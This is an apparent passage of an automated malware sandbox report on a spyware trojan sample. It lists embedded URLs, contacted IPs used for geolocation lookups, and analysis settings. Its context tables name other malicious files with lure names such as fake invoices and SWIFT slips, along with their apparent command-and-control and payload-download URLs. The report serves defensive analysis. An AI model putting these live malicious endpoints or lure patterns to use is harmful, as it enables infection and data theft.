00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350463469.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350382122.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350322150.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350247010.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnhkPs	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346586583.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346500462.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krs-c	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.345941905.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.357645729.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361831271.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.358838431.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361696046.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.359655805.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.360042860.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361430870.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361278692.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.358471484.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.360962312.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343103831.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343632448.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343298180.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343363099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343219300.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343171831.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343486314.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343430970.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343328345.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343398665.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comC	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnw	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348852099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comB.TTF	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362640132.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362961626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437323044.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362717209.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362577996.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362548135.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/11564914/23354;	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434179664.00000000030FB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.comTC1	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346182160.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.345941905.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346256859.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersz	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/li	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app/xml/	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352677508.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352522038.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352123535.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comF	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353734380.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354215467.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353609947.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354138837.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354002677.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353023886.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353202982.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354421323.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353944829.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353439899.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/7	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comTC	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/Ai	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comn	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.7	freegeoip.app	European Union	13335	CLOUDFLARENETUS	false
45.137.22.163	unknown	Netherlands	51447	ROOTLAYERNETNL	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	608210
Start date and time: 12/04/202221:47:40	2022-04-12 21:47:40 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.24445 (renamed file extension from 24445 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 70% Quality standard deviation: 12.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 65 Number of non-executed functions: 13
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fp-as-nocache.azureedge.net, client.wns.windows.com, fp-afd.azureedge.net, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b-ring.msedge.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:49:30	API Interceptor	1x Sleep call for process: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
188.114.97.7	http://0kjrj.xyz	Get hash	malicious	Browse	0kjrj.xyz/favicon.ico
	RFQ 37 - DR104505 - 9404864 -ArcelorMittal.xlsx	Get hash	malicious	Browse	ilpem-ar.com/pworwz.exe
	supply.xlsx	Get hash	malicious	Browse	controlsvr1.ga/Concord/fre.php
	61901.exe	Get hash	malicious	Browse	www.directionsettingpoint.xyz/inga/?6lo=8BtgmMqaAyTT5C2F4aHPQZ2h2z3JotTfuYVX8E6Ff1S17CFQ3AlPaAhQqFk3VSbA8XFi&o6b=adX4P
	4A5l8L43H5.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	TfYc6qqpSW.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	NuGet.Common.dll.exe	Get hash	malicious	Browse	crypto-hunt.net/loader/uploads/sysadmin.exe
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	www.tigranmelikyan.com/as31/?2db=H5+ZosI6KJVKwubANHezfOEg2n25fhoIhHHgYwkYtXbChFJwiLLahR+ucGe3atKDaBL8&t6Ahe8=mR-0s2hXKbw
	sp5zGWm3lp.exe	Get hash	malicious	Browse	crypto-hunt.net/files/sysadmin.exe
	rgxqsVh0vo.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	DOCUMENTO_OFICIAL.54524786078485858624_269.21560870.561007.07248.vbs	Get hash	malicious	Browse	shuacr.diretosdewashington.us/?1/
	DOCUMENTO_OFICIAL.54524786078485858624_269.21560870.561007.07248.vbs	Get hash	malicious	Browse	shuacr.diretosdewashington.us/?1/
	C4IAMAXFkX.exe	Get hash	malicious	Browse	www.powellpromo.com/ud5f/?4h=7ngXgn2hy&2dCP3h=p0EAeSt3Yxi8RZyMZj81sewyj5w/wtT+o/omwTObT8CNDd/hiAYPKRHnG+370a8W1/WLYDfsOg==
	vbc.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	euro slip.xlsx	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	Payment Slip.xlsx	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	Proforma invoice.pdf.exe	Get hash	malicious	Browse	www.faktnews.info/cnt4/?8pIpUZ=7nen/PM+DYgrTGiBwyakkR58oidieoK8BE0qheAqH1BPNYPZLyC480K4iyAQFzUja+3Y&i0=o4llyxzXofK
	Wire Trf.xlsx	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	jFf7hizcUo.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
	DHL SHIPMENT DELIVERY-PACKAGE-INV-AWB247634563576.exe	Get hash	malicious	Browse	www.99099888.com/n00q/?Ez=65Xe4Dzdhj1dWdjtGjawQ+ZAtAn1IVLIAuCyuLyBrpkklYGBqgihqb6486Bj6E+200gf&q8=k0DHR

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
checkip.dyndns.com	order confirmation 46574 -QT-04-0022.exe	Get hash	malicious	Browse	193.122.6.168
	Revised Proforma Invoice.exe	Get hash	malicious	Browse	193.122.6.168
	ZHOU0422.exe	Get hash	malicious	Browse	132.226.8.169
	img-000.exe	Get hash	malicious	Browse	132.226.8.169
	Bahon Ltd Inquiry#20220412.exe	Get hash	malicious	Browse	193.122.6.168
	KW05200000032220.exe	Get hash	malicious	Browse	193.122.6.168
	Products Inquiries.exe	Get hash	malicious	Browse	132.226.8.169
	jRzSg8vuKb.exe	Get hash	malicious	Browse	193.122.130.0
	DhETQ6889l.exe	Get hash	malicious	Browse	193.122.130.0
	PO_28001.exe	Get hash	malicious	Browse	132.226.8.169
	Halkbank001.exe	Get hash	malicious	Browse	193.122.130.0
	INVOICE.exe	Get hash	malicious	Browse	132.226.8.169
	74403100002.xlsm	Get hash	malicious	Browse	193.122.6.168
	Fl5JugGjR8.exe	Get hash	malicious	Browse	132.226.247.73
	Swift Copy.exe	Get hash	malicious	Browse	132.226.8.169
	Payment slip.exe	Get hash	malicious	Browse	193.122.6.168
	rerwsr.exe	Get hash	malicious	Browse	193.122.6.168
	Halkbank_Ekstre_20220327_073712_983787.pdf.exe	Get hash	malicious	Browse	158.101.44.242
	SWIFT gelen mesaj bildirim- dekont.exe	Get hash	malicious	Browse	158.101.44.242
	Ref-04122022115609.exe	Get hash	malicious	Browse	132.226.8.169
freegeoip.app	order confirmation 46574 -QT-04-0022.exe	Get hash	malicious	Browse	188.114.97.7
	Revised Proforma Invoice.exe	Get hash	malicious	Browse	188.114.96.7
	ZHOU0422.exe	Get hash	malicious	Browse	188.114.97.7
	img-000.exe	Get hash	malicious	Browse	188.114.97.7
	Bahon Ltd Inquiry#20220412.exe	Get hash	malicious	Browse	188.114.96.7
	KW05200000032220.exe	Get hash	malicious	Browse	188.114.96.7
	Products Inquiries.exe	Get hash	malicious	Browse	188.114.97.7
	jRzSg8vuKb.exe	Get hash	malicious	Browse	188.114.96.7
	DhETQ6889l.exe	Get hash	malicious	Browse	188.114.96.7
	PO_28001.exe	Get hash	malicious	Browse	188.114.96.7
	Halkbank001.exe	Get hash	malicious	Browse	188.114.96.7
	INVOICE.exe	Get hash	malicious	Browse	188.114.96.7
	74403100002.xlsm	Get hash	malicious	Browse	188.114.97.7
	Swift Copy.exe	Get hash	malicious	Browse	188.114.96.7
	Payment slip.exe	Get hash	malicious	Browse	188.114.97.7
	rerwsr.exe	Get hash	malicious	Browse	188.114.96.7
